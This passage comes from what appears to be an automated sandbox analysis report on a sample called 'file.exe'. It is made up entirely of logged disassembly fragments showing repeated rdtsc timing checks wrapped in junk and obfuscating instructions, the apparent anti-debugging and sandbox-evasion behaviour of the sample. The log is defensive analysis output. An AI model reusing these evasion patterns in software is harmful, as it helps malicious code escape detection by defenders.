00007F6C698AAEECh 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4EB7 second address: 7E4EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6C6956DA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E400C second address: 7E401D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E5E0C second address: 7E5E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4EC2 second address: 7E4F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, di 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F6C698AAEE8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e jo 00007F6C698AAEF9h 0x00000034 jmp 00007F6C698AAEF3h 0x00000039 call 00007F6C698AAEEDh 0x0000003e mov dword ptr [ebp+122D1BD6h], esi 0x00000044 pop ebx 0x00000045 mov edi, dword ptr [ebp+122D3368h] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 sub bx, F9C4h 0x00000057 mov eax, dword ptr [ebp+122D0C25h] 0x0000005d push 00000000h 0x0000005f push eax 0x00000060 call 00007F6C698AAEE8h 0x00000065 pop eax 0x00000066 mov dword ptr [esp+04h], eax 0x0000006a add dword ptr [esp+04h], 0000001Dh 0x00000072 inc eax 0x00000073 push eax 0x00000074 ret 0x00000075 pop eax 0x00000076 ret 0x00000077 push FFFFFFFFh 0x00000079 jmp 00007F6C698AAEEAh 0x0000007e nop 0x0000007f push eax 0x00000080 push edx 0x00000081 pushad 0x00000082 jmp 00007F6C698AAEF0h 0x00000087 jp 00007F6C698AAEE6h 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7BF0 second address: 7E7BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E5E10 second address: 7E5EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F6C698AAEE8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 pushad 0x00000025 mov cx, B6E5h 0x00000029 jmp 00007F6C698AAEF7h 0x0000002e popad 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov dword ptr [ebp+122D1ADEh], ebx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov eax, dword ptr [ebp+122D0955h] 0x00000049 jnp 00007F6C698AAF06h 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007F6C698AAEE8h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b add dword ptr [ebp+12453575h], eax 0x00000071 and di, 9B01h 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 push esi 0x0000007a push edx 0x0000007b pop edx 0x0000007c pop esi 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4F83 second address: 7E4FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6C6956DA58h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7BF6 second address: 7E7C9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6C698AAEE8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+12453E78h], esi 0x0000002c push 00000000h 0x0000002e mov ebx, dword ptr [ebp+1244DB3Ch] 0x00000034 xor bh, 00000007h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F6C698AAEE8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 jmp 00007F6C698AAEF4h 0x00000059 push eax 0x0000005a pushad 0x0000005b jns 00007F6C698AAEF5h 0x00000061 pushad 0x00000062 jmp 00007F6C698AAEEFh 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8B10 second address: 7E8B85 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F6C6956DA48h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F6C6956DA48h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov bx, 946Fh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007F6C6956DA50h 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8B85 second address: 7E8B94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C698AAEEAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E7E58 second address: 7E7E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E9BB5 second address: 7E9BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E8D26 second address: 7E8D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6C6956DA50h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EABBE second address: 7EAC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6C698AAEE6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor bx, 5E1Fh 0x00000014 sbb bh, FFFFFF86h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F6C698AAEE8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 xor edi, 0B4C8413h 0x00000039 push 00000000h 0x0000003b movsx ebx, cx 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 pop edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EAC09 second address: 7EAC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ECED9 second address: 7ECEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ECEDD second address: 7ECEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7ECEE3 second address: 7ECEF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C698AAEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDEC8 second address: 7EDF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F6C6956DA48h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F6C6956DA48h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 jno 00007F6C6956DA48h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDF24 second address: 7EDF29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDF29 second address: 7EDF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6C6956DA56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EEF41 second address: 7EEF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F11F4 second address: 7F11FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F11FA second address: 7F1262 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor edi, 29E19A2Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 movsx edi, bx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F6C698AAEE8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a push ecx 0x0000003b mov ebx, dword ptr [ebp+122D2136h] 0x00000041 pop ebx 0x00000042 mov eax, dword ptr [ebp+122D1651h] 0x00000048 mov edi, dword ptr [ebp+122D3947h] 0x0000004e mov edi, 29C06691h 0x00000053 push FFFFFFFFh 0x00000055 jo 00007F6C698AAEE8h 0x0000005b mov bl, 01h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F1262 second address: 7F1268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4B5B second address: 7F4B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C698AAEE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4B66 second address: 7F4B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C6956DA4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8DE6 second address: 7F8DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F8738 second address: 7F873E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD55 second address: 7FDD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6C698AAEE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD5F second address: 7FDDC1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop esi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 jmp 00007F6C6956DA4Eh 0x0000001d pop ecx 0x0000001e mov eax, dword ptr [eax] 0x00000020 jne 00007F6C6956DA5Bh 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a jbe 00007F6C6956DA64h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F6C6956DA52h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDEA7 second address: 7FDEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDFE9 second address: 7FDFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDFEE second address: 7FDFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804329 second address: 804364 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6C6956DA53h 0x00000008 pop ecx 0x00000009 jmp 00007F6C6956DA57h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jne 00007F6C6956DA46h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804364 second address: 804368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804368 second address: 804377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6C6956DA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78FB71 second address: 78FB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802F1C second address: 802F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA4Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802F2F second address: 802F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802F33 second address: 802F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802F39 second address: 802F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C698AAEF8h 0x0000000b popad 0x0000000c pushad 0x0000000d jl 00007F6C698AAEEEh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802F63 second address: 802F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802F6A second address: 802F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80355D second address: 803573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA50h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803573 second address: 803577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803577 second address: 803581 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C6956DA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803867 second address: 80386D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803BE4 second address: 803BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D10 second address: 803D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D1F second address: 803D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D23 second address: 803D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D2F second address: 803D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D35 second address: 803D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D39 second address: 803D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D3D second address: 803D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803D43 second address: 803D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803E7A second address: 803EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F6C698AAEE6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jno 00007F6C698AAEEEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jnp 00007F6C698AAF14h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80402D second address: 804031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804031 second address: 804040 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804040 second address: 804045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8041AA second address: 8041DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6C698AAEF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C698AAEF4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8041DD second address: 8041E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80AB38 second address: 80AB43 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F6C698AAEE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4231 second address: 7D4264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C6956DA57h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4264 second address: 7D427B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D480F second address: 7D4813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4813 second address: 7D485F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 39430093h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6C698AAEE8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b clc 0x0000002c call 00007F6C698AAEE9h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 jg 00007F6C698AAEE6h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D485F second address: 7D4871 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C6956DA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F6C6956DA46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D49C1 second address: 7D49C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4B0F second address: 7D4B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jno 00007F6C6956DA46h 0x0000000b jnc 00007F6C6956DA46h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jng 00007F6C6956DA4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4B2F second address: 7D4B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF0h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4C07 second address: 7D4C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4CE6 second address: 7D4CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4CEC second address: 7D4D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C6956DA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub cl, FFFFFF82h 0x00000011 push 00000004h 0x00000013 sbb edx, 27DE793Eh 0x00000019 nop 0x0000001a jnc 00007F6C6956DA58h 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F6C6956DA46h 0x00000028 rdtsc
